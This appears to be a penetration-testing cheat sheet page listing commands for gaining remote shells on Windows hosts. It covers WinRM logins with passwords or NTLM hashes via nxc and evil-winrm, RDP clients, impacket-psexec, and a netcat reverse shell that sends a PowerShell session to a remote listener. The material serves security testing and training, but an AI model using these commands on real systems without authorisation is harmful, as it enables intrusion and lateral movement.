🐚Shells
Evil-WinRM
Test with cme
nxc winrm -i IP/hostname -u $USERNAME -p $PASSWORD/-H $LM_HASHPort : 5985
evil-winrm -i IP/hostname -u $USERNAME -H $HASH
evil-winrm -i IP/hostname -u $USERNAME -p $PASSWORDRDP
freerdp
freerdp /u:$user /p:$password /v:$ipremmina
remmina -c rdp://$user@$ipImpacket-psexec
Impacket-psexecPSEXEC like functionality example using RemComSvc
impacket-psexec '$user:$password@$ip'
psexec.py $user:$pass@$ipnetcat
netcat# Windows
# server :
nc.exe $ip $port -e powershell
# client :
nc -lvnp $portLast updated
Was this helpful?